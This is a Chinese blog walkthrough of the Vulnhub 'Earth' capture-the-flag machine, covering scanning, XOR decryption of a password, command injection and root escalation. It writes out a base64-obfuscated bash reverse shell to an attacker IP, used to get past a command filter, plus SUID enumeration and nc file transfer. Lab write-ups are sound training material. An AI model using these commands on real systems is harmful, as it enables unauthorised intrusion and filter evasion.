earth靶机攻略

最新推荐文章于 2023-11-23 19:21:38 发布
最新推荐文章于 2023-11-23 19:21:38 发布
阅读量58 收藏
点赞数
分类专栏: 靶机系列 文章标签: 数据库 网络 网络安全 学习方法 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133895383
版权

earth

扫描

nmap -sV -A -p- 10.4.7.140

此处扫描结果有DNS

image-20231017195816245

80无法正常访问,因此需要修改hosts配置文件

sudo vim /etc/hosts

image-20231017200039896

使用dirb扫描这两个不同的域名,以及443https服务下的域名

dirb http://earth.local
dirb http://terratest.earth.local
dirb https://terratest.earth.local
dirb https://earth.local

image-20231017201201288

四个结果几乎都是这样

只有https的terratest结果不一样

image-20231017201321431

此处扫描的有一个robots文本文件

访问结果如图

image-20231017201635010

此处尝试最后一个访问,发现没有后缀无法访问,只能尝试,因为时notes命名,猜测为.txt

https://terratest.earth.local//testingnotes.txt

因此使用该url访问

内容如图

image-20231017202014290

渗透

此处获取一些信息,先查看下提及的testdata.txt文件,因为它说该文件用来测试加密

image-20231017202403508

此处感觉像是介绍,好像没有包含有效信息

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

此处为首页展示的三串密文

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

解码,密钥为刚才的文本文件

image-20231017203615586

image-20231017203703786

发现该内容都是这一句的重复

earthclimatechangebad4humans

此处只有第三个解出来不是乱码,显然是有用的信息

此前也给了一个用户名,尝试一下登录

image-20231017210124089

登录过后有个命令执行框,尝试执行命令,发现ip部分应该有过滤,也可能部分命令过滤

直接执行反弹shell不行,此处使用一些手段处理shell指令

bash -i >& /dev/tcp/10.4.7.138/12138 0>&1
base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMTM4LzEyMTM4IDA+JjE=
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMTM4LzEyMTM4IDA+JjE= | base64 -d | bash

使用管道符作为拼接,最后执行成功

image-20231017211515825

此处寻找一下有执行权限的文件

find / -perm -4000 2>/dev/null

有一个名称为reset_root的文件,重置root

查看它内容

image-20231017212745733

除了上面一行,其它都乱码了

好像该文件是要把密码改为Earth

提权

┌──(root㉿kali)-[~]
└─# nc -lnvp 9999 > reset_root

bash-5.1$ nc 10.4.7.138 9999 < /usr/bin/reset_root

image-20231017213335255

chmod +777 reset_root
ltrace ./reset_root

使用ltrace看看该文件不能正常执行的原因

image-20231017214020140

发现缺少这三个目录文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

在靶机中创建这三个文件夹,随后执行reset_root

显示密码更换完成 Earth

切换用户到root

image-20231017221956382

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
靶机操作练习,earth 靶机实战练习
09-08
在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行了主机信息收集。通过探测IP地址192.168.119.129,发现靶机上开放了...
Earth靶机实验实战演练
lianliandad的博客
11-01 933
好好学习
vulnhub——Earth靶机
Re1_zf的博客
10-28 2060
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1046
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1645
靶机名称Earth
渗透测试-vulnhub靶机 Earth
最新发布
2301_79441074的博客
11-23 108
dns解析 ,xor解码,
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Planets Earth, Mars and the Moon
12-04
该包提供了这些逼真的行星:地球,火星和月球。五百多mb,高清 Features: - Works on Unity 5 and Unity 4. ( 2 versions ) - Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly customizable shaders with normals, night lights, specular, and inner atmosheric scattering effect. - Separated clouds and clouds shadows. - Outer atmosphere shader with scattering effect. - High polygon sphere (about 40000 triangles) - A set of 8K textures - Milky Way skybox - Included demo scene that shows how everything works.
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1234
一次打靶记录。
vulnhub:EARTH靶机
qq_63283137的博客
09-13 989
在地球历史的最初10亿年里,海洋中出现了生命,并开始影响地球的大气和表面,导致厌氧生物的激增,后来又出现了好氧生物。从上面内容得到了一个信息,加密算法是xor,有个testdata.txt文件,用户名是terra。发现有个testingnotes文件,但是不知道是何种格式,自己尝试测试发现是txt文件格式。或者我们应该每周换一次钥匙?发现是禁止远程链接,发现需要对ip地址进行16进制的转化绕过。*需要改进的消息界面和管理面板的界面,它目前是非常基本的。*使用XOR加密作为算法,应该是安全的RSA使用。
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3075
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2296
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
渗透Earth bajiceshi
m0_70075898的博客
09-22 328
网络安全
渗透测试学习靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1735
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
vulnhub的earth靶机训练
ccssggoo的博客
03-11 814
靶机下载地址:The Planets: Earth ~ VulnHub 渗透机:kali2022 靶机:未知linux Earth 老规矩先用netdiscover -r 192.168.10.0/24扫描出靶机ip 扫描靶机 发现靶机开放了22,80,443端口,且绑定了dns信息,需要修改hosts文件才能访问,linux中hosts文件在/etc/hosts,windows在C:\Windows\System32\drivers\etc\hosts,在文件后面加入 渗...
靶机练习 No.21 Vulnhub靶机 Earth xor 命令执行ip10进制绕过 getshell suid 提权 strace 调试reset_root
YouthBelief的博客
01-21 3440
0x00 环境准备 下载链接 https://www.vulnhub.com/entry/the-planets-earth,755/ 靶机介绍 难度:简单 上架时间:2021年11月2日 提示信息: Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值